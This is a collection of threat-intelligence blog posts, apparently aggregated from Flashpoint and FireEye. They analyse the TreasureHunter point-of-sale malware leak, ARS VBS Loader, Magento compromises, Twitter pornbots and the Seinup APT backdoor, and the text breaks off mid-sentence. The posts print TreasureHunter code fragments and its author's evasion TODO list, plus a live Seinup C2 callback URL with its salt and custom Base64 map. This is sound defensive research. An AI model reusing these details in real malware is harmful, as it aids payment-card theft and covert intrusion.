TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked

The source code for a longstanding point-of-sale (PoS) malware family called TreasureHunter has been leaked on a top-tier Russian-speaking forum. Compounding the issue is the coinciding leak by the same actor of the source code for the malware’s graphical user interface builder and administrator panel.

The availability of both code bases lowers the barrier for entry for cybercriminals wishing to capitalize on the leaks to build their own variants of the PoS malware.

Point-of-sale malware has been at the root of many breaches, including massive thefts at retailers Target in 2013 and Home Depot in 2014; in each case attackers were able to extract more than 100 million payment card and customer records from point-of-sale terminals by scraping card data before it was encrypted and sent to the payment processor. Both retail giants paid tens of millions of dollars in settlements, and in Target’s case, its chief executive officer resigned his position.

Industry Collaboration on Detection and Prevention

TreasureHunter has been known and investigated since 2014, but until now investigators have had to reverse-engineer its code in order to analyze it. Now with the full code available, analysts have previously unseen insight into the malware’s operation. Flashpoint analysts, who discovered the source code leak in March, proactively collaborated with researchers at Cisco Talos, who reviewed and improved protections, and advanced-detection mechanisms, in an effort to disrupt potential copycats who may have their hands on the source code.

In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code. Notably, the original developer appears to be a Russian speaker who is proficient in English. Originally, this malware appears to have been developed for the notorious underground shop dump seller “BearsInc,” who maintained presence on various low-tier and mid-tier hacking and carding communities (below is a graphical representation of such an operation on the Deep & Dark Web). It’s unknown why the source code was leaked at this time.

A graphical representation of a typical cybercrime dump shop ecosystem.

Image 1: A graphical representation of a typical cybercrime dump shop ecosystem.

One Leak Can Spawn Many Variants

TreasureHunter behaves like many other point-of-sale malware samples. Once an attacker has access to a Windows-based server and the point-of-sale terminal, the malware is installed and it establishes persistence by creating a registry key that runs the malware at startup. It then enumerates running processes, and scans device memory looking for track data, including primary account numbers (PANs), separators, service codes, and more. It then establishes a connection with the attacker’s command and control server and sends the stolen data to the criminal.

The leak of the builder adds another dimension to the availability of the TreasureHunter payload and configurations. In the past, malware source code leaks such as the Zeus banking Trojan have spawned numerous variants, including Citadel, which cost organizations hundreds of millions in losses. PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware which led to the creation of the ProPoS and Katrina variants. The actor behind the TreasureHunter leak said:

“Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs ( not at a very high rate, but it still does ) and besides that , since now you have the source code, it can be update anytime for your own needs.”

For researchers, the availability of the source code opens the door into new avenues of analysis and proactive visibility into such activity on the underground. This affords organizations such as Flashpoint the ability to collaborate with others in the industry such as Cisco Talos in this case to improve existing protections and force attackers back to the drawing board.

Source-Code Level Insight

The code project appears to be called internally trhutt34C, and was written in pure C with no C++ features. It was compiled originally in Visual Studio 2013 on Windows XP. Based on analysis, researchers believe the developer intended to improve and redesign various features including anti-debugging, code structure improvement, and gate communication logic. With the goal of additional features to be improved, the developer hoped frustrate malware analysis and subsequent research; the actor left behind a note that said: “We want the malware researchers screamin’!”

A snapshot of the TreasureHunter source code.

Image 2: A snapshot of the TreasureHunter source code.

The unfinished project included continued improvement code snippets, below:

  • TO DO for the next version of the client (0.2 Beta):
    • Replace all Unicode versions of functions with ANSI versions. Now why did I ever go for wide-char in the first place?..
  • Improve the code structure:
    • Replace all the if – else constructs that are rendered needless by return commands;
    • Organize the includes;
    • Give the code proper commenting so that I am able to modify and improve it after not having seen it for some time (if such a thing happens).
    • Make scan exceptions and service codes configurable.
    • Add the following commands to the gate communication logic:
    • Download and execute for updating;
    • Remote CMD command execution;
    • Remote self-removal for emergency cases.
    • Add anti-debugging:
      • Use self-debugging by creating a child process (may be improved later by reversing the tables);
      • Improve the MD5 function and use it to find debuggers by signatures (maybe to be added in future versions);
      • Use GetTickCount to detect parts of code being stepped through (maybe to be added in a “heuristical” joint algorithm with the abovementioned);
      • Upon finding a debugger, destroy the critical section and/or start creating new threads infinitely until the application crashes.
      • Maybe also kill processes and delete debuggers and/or decompilers permanently. We want the malware researchers screamin’!
  • Add better persistency and timeouts to gate communication.
  • Add local saving of data if the gate can’t be reached for a certain period of time.
  • Add the option to run the program as a service on Windows XP.
  • Improve the code structure and add comments to avoid future confusion.
  • Add error handling and backup restart in case of crash or heap overflow (malloc fail).
  • Improve the Clingfish system (so that a clingfish thread doesn’t do the same thing as the main thread right after being spawned).
  • Debug the system information extraction mechanism further (on different OS versions).
  • Improve the track-finding algorithm to make it faster.

The stolen dump structure is as follows. The structure contains the following key elements used to collect and operate with stolen dumps, such as unique machine information and where scraped data is from:

typedef struct dumpsHolder {
TCHAR *lpFileName;
int lpFileNameLength;
int procID;
char *trackArr;
int trackArrLength;
} dumpsHolder;

The credit card process scan works in exception mode:

char *scanExceptions[SCANEXCEPTIONSNUM] = {“System32”, “SysWOW64”, “\Windows\explorer.exe”};

The malware focuses on scraping credit card track data, focusing on the following service codes:

char *serviceCodes[SERVICECODESNUM] = {“101”, “201”, “121”, “231”, “221”, “110”};

Registry persistence for autostart in HKLMMicrosoftWindowsCurrentVersionRun runs as “jucheck.”

A registry key created by the malware for persistence

Image 3: A registry key created by the malware for persistence.

The source code is consistent with the various samples that have been seen in the wild over the last few years. TreasureHunterconfig.h shows definite signs of modification over the lifespan of the malware. Early samples filled all of the configurable fields with FIELDNAME_PLACEHOLDER to be overwritten by the builder. More recent samples, and the source code, instead writes useful config values directly into the fields. This makes the samples slightly smaller and uses fresh compiles to create reconfigured files.

The post TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked appeared first on Flashpoint.

Go to Source
Author: Flashpoint

RAT Gone Rogue: Meet ARS VBS Loader

Malicious VBScript has long been a fixture of spam and phishing campaigns, but until recently its functionality has been limited to downloading malware from an attacker-controlled server and executing it on a compromised computer.

Researchers at Flashpoint have seen and analyzed a unique departure from this norm in ARS VBS Loader, a spin-off of a popular downloader called SafeLoader VBS that was sold and eventually leaked in 2015 on Russian crimeware forums.

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious “loaders”, i.e. initial infection vector malware families used to install subsequent payloads.

Image 1: ARS VBS Loader's administrative login portal.

Image 1: ARS VBS Loader’s administrative login portal.

The new loader has been spammed out in email attachments enticing victims with lures in subject lines related to personal banking, package shipments, and toll road notifications. Should a victim interact with the attachment and launch it, analysts say numerous types of commodity malware could be installed, including the AZORult information-stealing malware. AZORult was also used in campaigns targeting more than 1,000 Magento admin panels; in those attacks, the malware was used to scrape payment card information from sites running the popular free and open source ecommerce platform.

ARS VBS Loader targets only Windows machines and supports Windows 10, according to posts to a Russian-speaking forum going back to December. Previously, another loader called FUD ASPC Loader, first advertised in May 2017, contained similar functionality but not Windows 10 support.

The loader is also likely to side-step detection by signature-based antivirus and intrusion detection systems because of the relative ease in which attackers can obfuscate VBScript, Flashpoint analysts said. Obfuscation through a variety of means allows attackers to hide malware; if the malware is obfuscated with encryption or packing, it’s exponentially more difficult for antivirus to sniff out malicious code, for example.

Once the ARS VBS Loader executes on a victim’s computer, it immediately creates a number of entries in nearly a dozen autorun locations, including registry, scheduled tasks, and the startup folder, ensuring persistence through reboots. ARS VBS Loader will connect to the attacker’s server, sending it system information such as the operating system version name, computer user name, RAM, processor and graphics card information, a randomly generated ID for infection tracking, and machine architecture information.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

The botmaster, meanwhile, can remotely administer commands to bots through the PHP command-and-control application. Communication with the command-and-control server is carried out in plaintext over HTTP, making it easy to spot, Flashpoint analysts said.
The malicious code that runs on the victim’s machine is written entirely in VBScript and contains functionality for updating and deleting itself, and deploying plugins such as a credentials stealer, or launching application-layer denial-of-service (DoS) attacks against websites, and loading additional malware from external websites.

The most common command spotted by analysts is download, which instructs bots to download and execute malware from a supplied URL. There is also the plugin command where plugins that steal passwords or capture desktop screenshots can be pushed to compromised computers.

The DDoS command is also noteworthy because it’s a unique capability; analysts said they have not seen this command used in the wild. The command tells bots to send a specified amount of HTTP POST requests to a particular URL. Since this is a simple application layer flooding attack, it is currently unknown how successful this attack would be against targets in the wild, analysts said, adding that it would be easy to spot such traffic because the same hardcoded POST values are sent in the HTTP flood.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Analysts caution that users should be vigilant about not opening email attachments from unknown sources, and that it’s likely ARS VBS Loader will continue to be an effective initial infection vector for spam campaigns.

To download the indicators of compromise (IOCs) for the ARS VBS Loader, click here.

To download the Yara rule for the ARS VBS Loader, click here.

The post RAT Gone Rogue: Meet ARS VBS Loader appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Compromised Magento Sites Delivering Malware

Ecommerce websites running on the popular open-source Magento platform are being targeted by attackers who are using brute-force password attacks to access administration panels to scrape credit card numbers and install malware that mines cryptocurrency.

Researchers at Flashpoint are aware of the compromise of at least 1,000 Magento admin panels, and said that interest in the platform has continued unabated on entry-level and top-tier Deep & Dark Web forums since 2016. Attackers have also demonstrated continued interest in other popular ecommerce-processing content management systems such as Powerfront CMS and OpenCart.

The Magento sites are being compromised through brute-force attacks using common and known default Magento credentials. Brute-force attacks such as these are simplified when admins fail to change the credentials upon installation of the platform. Attackers, meanwhile, can build simple automated scripts loaded with known credentials to facilitate access of the panels.

Once the attacker has control of the site’s Magento CMS admin panel, they have unfettered access to the site and the ability to add any script they choose. In this case, the attackers were injecting malicious code in the Magento core file, allowing them access to pages where payment data is processed. POST requests to the server containing sensitive data are then intercepted and redirected to the attacker.

Flashpoint analysts said the compromised sites return an exploit in the form of a phony Adobe Flash Player update, which if launched by the user runs malicious JavaScript that downloads malware from attacker-controlled servers on GitHub and other compromised sites onto the victim’s computer.

Analysts said the infection chain begins with the installation of data-stealing malware called AZORult from a binary hosted on GitHub. AZORult then downloads additional malware; in this campaign, the additional malware is the Rarog cryptocurrency miner. The attackers are keen on avoiding detection and update the malicious files daily in order to sidestep signature- and behavior-based detection. Flashpoint said the accounts hosting these files have been active since 2017.

Image 1: Anatomy of the attack.

Image 1: Anatomy of the attack.

Flashpoint said that most of the victims among the 1,000 panels it is aware of are in the education and healthcare industries, and that the IP addresses of the compromised panels map to locations in the United States and Europe.

Analysts assess that this is likely only a set of a larger sample of compromised Magento panels.

Flashpoint is working with law enforcement to notify victims of these compromises.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

In the meantime, the rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks where hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords. The compromised IoT devices were corralled into a massive botnet that was pointed at a number of high-value targets including DNS provider Dyn, French webhost OVH, and journalist Brian Krebs’ website in order to carry out crippling distributed denial-of-service attacks. The DDoS attack against Dyn peaked at 1 terabyte-per-second and took a number of popular websites and services offline for the better part of day in October 2016, including Twitter, Spotify and GitHub.

Magento admins are advised to review CMS account logins and mitigate their exposure to brute-force attacks by enforcing the following password-hygiene practices:

  • Enforce organizational password complexity requirements.
  • Restrict users from recycling previously used passwords.
  • Enable two-factor authentication for sensitive systems, applications, databases, and remote access solutions.
  • Supply users with secure password managers to assist with password requirements.

The indicators of compromise (IOCs) for AZORult, Rarog, and the campaign targeting Magento are available for download here. The Yara rule is available for download here.

The post Compromised Magento Sites Delivering Malware appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Inside a Twitter ‘Pornbot’ Campaign

Flashpoint analysts recently investigated the trend of adult entertainment-themed Twitter bots known as pornbots, which post tweets with hashtags containing popular brand names alongside random, unrelated terms. The observed set of pornbots appears to be a mix of compromised accounts and accounts specifically created to advertise pornography. As such, organizations mentioned in these bots’ pornographic advertising campaigns on Twitter may suffer reputational damage in addition to distorted social media engagement campaign metrics.

Image 1: Sample of tweets containing brand hashtags and random terms. Brand names have been sanitized

Image 1: Sample of tweets containing brand hashtags and random terms. Brand names have been sanitized.

In recent years, Twitter has become a primary form of external, two-way communication and engagement for organizations across all sectors. For example, companies often use hashtags to monitor the spread and reception of marketing campaigns and sponsored events. More crucially, emergency services may use hashtag tracking to gain real-time insight into current situations during natural disasters and other crises. In a worst-case scenario, pornbots or other spambots could identify a trending hashtag and distort the conversation by sharing unrelated or false information.

Image 2: Three sample pornbot Twitter accounts using the same profile picture. Each pornbot has a different username, bio, and join date, and each bio contains a link to a different adult entertainment website. However, these adult entertainment websites were hosted on common servers.

Image 2: Three sample pornbot Twitter accounts using the same profile picture. Each pornbot has a different username, bio, and join date, and each bio contains a link to a different adult entertainment website. However, these adult entertainment websites were hosted on common servers.

Flashpoint analysts identified three distinct sets of pornbots using identical hashtags, indicating they were likely part of the same organized campaign. While similar in appearance and often using a common set of profile pictures across the groups, each promoted a different adult website. However, the three adult websites linked to the sample profiles shown above were hosted on one of two common servers, which may indicate the pornbots share a common origin. Flashpoint analysts did not detect any malicious files on the servers hosting the websites advertised by the pornbots.

Advertising Methods

Flashpoint analysts observed two primary methods of advertising across the pornbot accounts:

• Hashtagged tweets: The first advertising method utilized hashtags followed by random risqué buzzwords and a link to an adult dating or video website, often featuring online “cam girls” or escort services.

• Link in bio and pinned tweet: The second advertising method includes multiple accounts sharing similar bios and pinned tweets, which contain links to adult content sites.

Image 3: Example of the first method of advertising adult entertainment sites, whereby links are included within hashtagged tweets.

Image 3: Example of the first method of advertising adult entertainment sites, whereby links are included within hashtagged tweets.

 Image 4: Example of a pornbot account using the second advertising method, whereby links to adult websites are included in the bio and the pinned tweet.

Image 4: Example of a pornbot account using the second advertising method, whereby links to adult websites are included in the bio and the pinned tweet.

Identifying Pornbots

Image 5: Sample guide to identifying pornbots and spambots.

Image 5: Sample guide to identifying pornbots and spambots.

Over the course of their investigation, Flashpoint analysts noted several common traits that can be used to identify pornbots and other spambots:

• Reused profile images: The profile pictures used by the observed pornbots were all obtained from public profiles on open-source websites, primarily Instagram and Pinterest. Reverse searches using Google Images indicated these stolen images were resused by multiple pornbots.

• Systematic coordination: Related sets of pornbots systematically coordinated their tweets. One pornbot would post a tweet containing a hashtag, and other pornbots within its group would subsequently post tweets containing the same hashtag, followed by random and unrelated terms. 

• Many tweets, but few followers: Each of the observed pornbots posted tweets at a rapid cadence, with some posting more than 50 times per day. Most of the observed pornbot accounts boasted more than 10,000 tweets, but typically had fewer than 200 followers. Similarly, most of the pornbots were following fewer than 200 other users. 

Image 6: Example of a reverse Google Images search revealing use of a single profile image across multiple pornbot accounts.

Image 6: Example of a reverse Google Images search revealing use of a single profile image across multiple pornbot accounts.

Image 7: Example of systemically coordinated tweeting among pornbots.

Image 7: Example of systemically coordinated tweeting among pornbots.

Pornbot Mitigation Best Practices

The following mitigation measures may help reduce the number of pornbots and spambots using brand names. These steps may also reduce the number of false detections and aid in validating social media metrics:

• Challenge social media teams to identify and block pornbots and spambots following company social media accounts. This action impacts the bots’ ability to capture and retweet relevant and branded tweets.

• Require social media teams to report these accounts through Twitter’s abuse function.

• Implement response actions to react to large campaigns, such as social media teams and cyber threat teams notifying each other when activity is detected.

The post Inside a Twitter ‘Pornbot’ Campaign appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Trojan.APT.Seinup Hitting ASEAN

1. Executive Summary

The FireEye research team has recently identified a number of spear
phishing activities targeting Asia and ASEAN. Of these, one of the
spear phishing documents was suspected to have used a potentially
stolen document as a decoy. The rich and contextual details (body and
metadata) which are not available online lead us to believe this was
stolen. This decoy document mentioned countries such as Brunei,
Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore,
Thailand, and Vietnam, which leads us to suspect that these countries
are targeted. As the content of this decoy document is suspected to be
a stolen sensitive document, the details will not be published.

This malware was found to have used a number of advance techniques
which makes it interesting:

  1. The malware leverages Google Docs to perform redirection to
    evade callback detection. This technique was also found in the
    malware dubbed “Backdoor.Makadocs” reported by Takashi
    Katsuki (Katsuki, 2012).
  2. It is heavily equipped with a
    variety of cryptographic functions to perform some of its functions
    securely.
  3. The malicious DLL is manually loaded into memory
    which hides from DLL listing.

As depicted in the diagram below, the spear phishing document (which
exploits CVE-2012-0158) creates a decoy document and a malware dropper
named exp1ore.exe. This dropper will then drop wab.exe (Address Book
Application) and wab32res.dll (malicious DLL) inside the temp folder.
By running wab.exe, the malicious DLL named wab32res.dll (located
within the same folder) will be loaded using DLL side-loading
technique. This will in turn install a copy of wab32res.dll as
msnetrsvw.exe inside the windows directory to be registered as Windows
service. By registering as a Windows service, it allows the malware to
survive every reboot and persist on the network.

1.MalwareFlow

Figure 1 Infection Flow

This malware is named “Trojan.APT.Seinup” because one of its export
functions is named “seinup”. This malware was analysed to be a
backdoor that allows the attacker to remote control the infected system.

2.ExportedFunctions

Figure 2 Exported Functions

2. Related APT Domain and MD5

Based on our threat intelligence and reverse-engineering effort,
below are some related domain and MD5 sums. Please note that some of
the domain/IP association may change.

2.1. Related Domain

Domain/URL IP Country Comments

elizabearden.com
elizabearden.com

124.172.243.211
124.172.243.211

CN
CN
Registrar:
XIN NET TECHNOLOGY CORPORATIONEmail:
liangcheng04@sina.com
Registrar: XIN NET
TECHNOLOGY CORPORATIONEmail: liangcheng04@sina.com

dnsserviceonline.com
dnsserviceonline.com

50.117.115.83
50.117.115.84
50.117.120.235
69.46.84.51
50.117.115.83
50.117.115.84
50.117.120.235
69.46.84.51

CN
CN
Registrar:
XIN NET TECHNOLOGY CORPORATIONEmail:
liangcheng04@sina.com
Registrar: XIN NET
TECHNOLOGY CORPORATIONEmail: liangcheng04@sina.com

symteconline.com
symteconline.com

175.100.206.183
175.100.206.183

CN
CN
Registrar:
XIN NET TECHNOLOGY CORPORATIONEmail:
Smartwise9851@yahoo.com
Registrar: XIN NET
TECHNOLOGY CORPORATIONEmail: Smartwise9851@yahoo.com

winshell.net
winshell.net

58.64.190.34
58.64.190.34

HK
HK
Registrar:
SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO.,
LTD.Email:
richardmatind@yahoo.com

Registrar: SHANGHAI
MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO., LTD.Email:

richardmatind@yahoo.com


philnewsonline.com
philnewsonline.com

50.93.198.128
50.93.198.128

US
US
Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

www.info-week.com
www.info-week.com

173.254.197.213
173.254.197.213

US
US
Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

go-twitter.com
go-twitter.com

50.93.198.113
50.93.198.113

US
US
Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

2.2. Associated Files

Name MD5 Comments

Spear-phishing document and decoy
document
Spear-phishing document and
decoy document
CONFIDENTIAL CONFIDENTIAL
CONFIDENTIAL
CONFIDENTIAL

iexp1ore.exe
iexp1ore.exe

137F3D11559E9D986D510AF34CB61FBC
137F3D11559E9D986D510AF34CB61FBC

Dropper
Dropper

wab.exe
wab.exe

CE67AAA163A4915BA408B2C1D5CCC7CC
CE67AAA163A4915BA408B2C1D5CCC7CC

Benign Address Book Application
Benign Address Book
Application

wab32res.dll
wab32res.dll

FB2FA42F052D0A86CBDCE03F5C46DD4D
FB2FA42F052D0A86CBDCE03F5C46DD4D

Malware to be side loaded when wab.exe is
launched.
Malware to be side loaded
when wab.exe is launched.

msnetrsvw.exe
msnetrsvw.exe

FB2FA42F052D0A86CBDCE03F5C46DD4D
FB2FA42F052D0A86CBDCE03F5C46DD4D

Malware to be installed as a service. Note: This is
the same as wab32res.dll.
Malware to be installed as
a service. Note: This is the same as wab32res.dll.



baf227a9f0b21e710c65d01f2ab01244
baf227a9f0b21e710c65d01f2ab01244

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80



0845f03d669e24144df785ee54f6ad74
0845f03d669e24144df785ee54f6ad74

Calls to www.dnsserviceonline.com:80

Calls to
www.dnsserviceonline.com:80



d64a22ea3accc712aebaa047ab818b07
d64a22ea3accc712aebaa047ab818b07

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80



56e6c27f9952e79d57d0b32d16c26811
56e6c27f9952e79d57d0b32d16c26811

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80



cdd969121a2e755ef3dc1a7bf7f18b24
cdd969121a2e755ef3dc1a7bf7f18b24

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80



709c71c128a876b73d034cde5e3ec1d3
709c71c128a876b73d034cde5e3ec1d3

Calls to www.dnsserviceonline.com:80

Calls to
www.dnsserviceonline.com:80

3. Interesting Technical Observations

3.1. Redirection Using Google Docs

By connecting the malicious server via Google Docs, the malicious
communication is protected by the legitimate SSL provided by Google
Docs (see Figure below). One possible way to examine the SSL traffic
is to make use of a hardware SSL decrypter within an organisation.
Alternatively, you may want to examine the usage pattern of the users.
Suppose a particular user accesses Google Docs multiple times a day,
the organization’s Incident Response team may want to dig deeper to
find out if the traffic is triggered by a human or by malware.

Retrieve Command

Figure 3 Retrieve Command via Google Docs

Below is the code that is used to construct a URL that retrieves
command via Google Docs. First, the malicious URL is constructed and
then encoded. Next, the malware simply leverages the Google Docs
viewer to retrieve the command from the malicious server (see Figure
below). 4.GoogleDocs

Figure 4 View Command via GoogleDocs

3.2. Zero-Skipping XOR Encryption

The shellcode encryption technique is fairly standard. The shellcode
has a decryption stub which decrypts its body using the XOR key 0x9E,
and this shellcode is used to extract exp1ore.exe(malware) and Wor.doc
(benign document).

The exp1ore.exe and Wor.doc were found within the spear phishing
document encrypted using the same key (0xFC) and technique. The XOR
key decrypts only a non-zero byte (see Figure 5). This prevents
statistical methods of recovering the XOR key. The encrypted
executable file and benign document were identified to be located
inside the spear phishing document at offsets 0x2509 and 0x43509 respectively.

5.ZeroSkipping

Figure 5 Zero Skipping XOR Encryption

Even though statistical methods may not be useful in identifying the
XOR key as the zero bytes are not encrypted, we could use some of the
“known” strings below to hunt for the XOR key in this situation. By
sliding the known string across the array of bytes to perform a
windowed XOR, the key would be revealed when the encoded data is XORed
with the known string.

  • “This program cannot be run in DOS mode”
  • “KERNEL32.dll”
  • “LoadLibraryA”

3.3. Deployment of Various Cryptographic Functions

3.3.1. Secure Callback

The malware performs the callback in a secure manner. It uses a
custom Base64 map to encode its data, and creates a salted digital
thumbprint to allow validation of data.

Below describes the steps to validate a callback using an example of
the following URL:

hxxp://www.elizabearden.com/waterphp/BYyH.php?dEIXozUlFzx=

5P

&wDq=

6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==

&k4fJdSp7=

cc3237bc79192a096440faca0fdae10

&GvQF2lotIr5bT2=

349118df672db38f9e65659874b60b27

The URL could be generalised as follows:

Domain/?=
<A’>
&=
<B’>
&=
<C’>
&=
<D’>

The definition of A’, B’, C’ and D’ are as follows:

Let H be the function which encodes binary into hexadecimal
characters prepend with “%”, if it is not alphanumeric, dash,
underscore or dot
.

Let B64 be the base 64 encoder using the following custom map, “URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY”.

Let PT be the plain text which is in the form of
“[]:{1}”,
where HostName and IPAddress are string, and RunType is a character.

Let A be the random of 3 to 7 characters, and A’ = H(A)

Let B be B64 (PT), and B’ = H(B)

Let C be 32 char deliminator, and C’ = H(C)

Let D be H( MD5 ( salt  + MD5 ( B64(PT) + A + C )  )   ), salt =
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23”  , and D’ = H(D)

Hence, in this case, the specific malicious URL could be applied as follows:

Domain/  =  http://www.elizabearden.com/waterphp/BYyH.php

A’ = “5Pb

B’ = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S%2Bw8npH5oAZk==

C’ = “cc3237bc79192a096440faca0fdae107

D’ = “

349118df672db38f9e65659874b60b27

(This is the digital signature)

The hash could be verified as follow:

B64(PT) + A + C =
“6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==” +  “5Pb” + “cc3237bc79192a096440faca0fdae107”

MD5 (B64(PT) + A + C) = “766cf9e96c1a508c59f7ade1c50ecd28”

MD5 (salt + MD5(B64(PT) + A + C))   = MD5 (
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23” + “766cf9e96c1a508c59f7ade1c50ecd28”)


= 349118df672db38f9e65659874b60b27
(This equals to D’, which means verified)

The encoded plain text (B) could be recovered:

B64(PT) = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==”;

PT = “MY_COMPUTER_NAME[F]:192.168.1.1{1}”, where “MY_COMPUTER_NAME”
is the hostname, ‘F’ is the run type, “192.168.1.1” is the IP address.

Note: This example is mocked up using a dummy computer name and IP address.

The python code below could be used to decode the custom encoded
string (see Figure below).

6.PythonCode

Figure 6 Python to Decode a Custom Base 64

3.3.2. Random Generator Using Mersenne Twister Algorithm

The malware was found to perform a callback at random intervals so
as to evade network investigation when looking for network connections
that are performed in a regular interval. Additionally, even the name
of the parameters in the get string have a random length and name,
which makes it hard to create a fix signature to detect such callbacks
(see ‎3.3.1 to understand how a callback is created).

7.Mersenne_twister

Figure 7 Mersenne Twister Algorithm Seeding function

 3.4. In-Memory Only Malicious Code

On the disk, the malicious code is either encrypted or compressed to
evade scanning using signature rules. Only upon being loaded into
memory, does the malicious code (that appears to be in the form of a
DLL) get manually loaded without the use of Windows 32 API. In this
way, when an investigation is performed, the malicious DLL is not
revealed. Additionally, it makes it much harder for analysis to be performed.

8.ZC_Loader

Figure 8 Segments in the memory which contains the malicious code

Taking a deeper look at the decrypted malicious code, this malware
was found to contain at least the following functions:

  • Download file
  • Download and execute or load
    library
  • Change sleep duration
  • Open and close
    interactive sessions

4. Conclusion

Malware is increasingly becoming more contextually advanced. It
attempts to appear as much as possible like legitimate software or
documents. In this example, we would conclude the following.

  1. A potentially stolen document was used as a decoy document to
    increase its credibility. It is also a sign that the compromised
    organisations could be used as a soft target to compromise their
    business partners and allies.
  2. It is important to put a stop
    to the malware infection at the very beginning, which is the
    exploitation phase. Once a network is compromised, it is
    increasingly harder to detect such threats.
  3. Anti-incident
    response/forensic techniques are increasingly used to evade
    detection. It would require a keen eye on details and a wealth of
    experience to identify all these advance techniques.

5. Works Cited

Carnegie Mellon University. (n.d.). Retrieved from http://www.cs.cmu.edu/~fp/courses/15122-f10/misc/rand/mersenne.c0

Katsuki, T. (19 Nov, 2012). Malware Targeting Windows 8 Uses
Google Docs.
Retrieved from http://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs-0

I would like to thank several colleagues for their significant
contributions on this post: Darien Kindlund, Ned Moran, Nart
Villeneuve, and Thoufique Haq.

Go to Source
Author: Chong Rong Hwa

Malware Callbacks

Today we released our first-ever analysis of malware callbacks. Our
report can be accessed here: http://www2.fireeye.com/WEB2013ATLReport.html.

FireEye monitored more than 12 million malware communications seeking
instructions—or callbacks—across hundreds of thousands of infected
enterprise hosts, capturing details of advanced attacks as well as
more generic varieties during the course of 2012. Callback activity
reveals a great deal about an attacker’s intentions, interests and
geographic location. Cyber attacks are a widespread global activity.
We’ve built interactive maps that highlight the presence of malware
globally:  http://www.fireeye.com/cyber-attack-landscape/.

Our key findings:

  • Malware has become a multinational activity. Over the past
    year, callbacks were sent to command and control (CnC) servers in 184
    countries—a 42 percent increase when compared to 130 countries in 2010.
  • Two key regions stand out as hotspots driving advanced cyber
    attacks: Asia and Eastern Europe.
    Looking at the average
    callbacks per company by country, the Asian nations of China, South
    Korea, India, Japan, and Hong Kong accounted for 24 percent. Not far
    behind, the Eastern European countries of Russia, Poland, Romania,
    Ukraine, Kazhakstan, and Latvia comprised 22 percent. (North America
    represented 44 percent but this is due to CnC servers residing in the
    United States to help attackers with evasion.)
  • The majority of Advanced Persistent Threat (APT) callback
    activities are associated with APT tools that are made in China or
    that originated from Chinese hacker groups
    . By mapping the DNA
    of known APT malware families against callbacks, FireEye Malware
    Intelligence Lab discovered that the majority of APT callback
    activities—89 percent—are associated with APT tools that are made in
    China or that originated from Chinese hacker groups. The main tool is
    Gh0st RAT.
  • Attackers are increasingly sending initial callbacks to servers
    within the same nation in which the target resides
    . To improve
    evasion, hackers are increasingly placing CnC servers within target
    nations. At the same time, this fact gives a strong indicator of which
    countries are most interesting to attackers.
  • Technology organizations are experiencing the highest rate of APT
    callback activity
    . With a high volume of intellectual property,
    technology firms are natural targets for attackers and are
    experiencing heavy APT malware activity.
  • For APT attacks, CnC servers were hosted in the United States 66
    percent of the time, a strong indicator that the U.S. is still the
    top target country for attacks
    . As previously mentioned,
    attackers increasingly put CnC servers in the target country to help
    avoid detection. With such a high proportion of CnC servers, by a wide
    margin, the U.S. is subject to the highest rate of malware attacks.
    This is likely, due to a very high concentration of intellectual
    property and digitized data that resides in the U.S.
  • Techniques for disguising callback communications are evolving.
    To evade detection, CnC servers are leveraging social networking sites
    like Facebook and Twitter for communicating with infected machines.
    Also, to mask exfiltrated content, attackers embed information inside
    common files, such as JPGs, to give network scanning tools the
    impression of normal traffic.
  • Attack patterns vary substantially globally:
  • South Korean firms experience the highest level of callback
    communications per organization
    . Due to a robust internet
    infrastructure, South Korea has emerged as a fertile location for
    cybercriminals to host their CnC infrastructure. For example, FireEye
    found that callbacks from technology firms are most likely to go to
    South Korea.
  • In Japan, 87 percent of callbacks originated and stayed in
    country
    . This may give an indication of the high value of Japanese
    intellectual property.
  • In Canada, 99 percent of callbacks exited the country. In the U.K.,
    exit rates were 90 percent
    . High exit rates indicate attackers
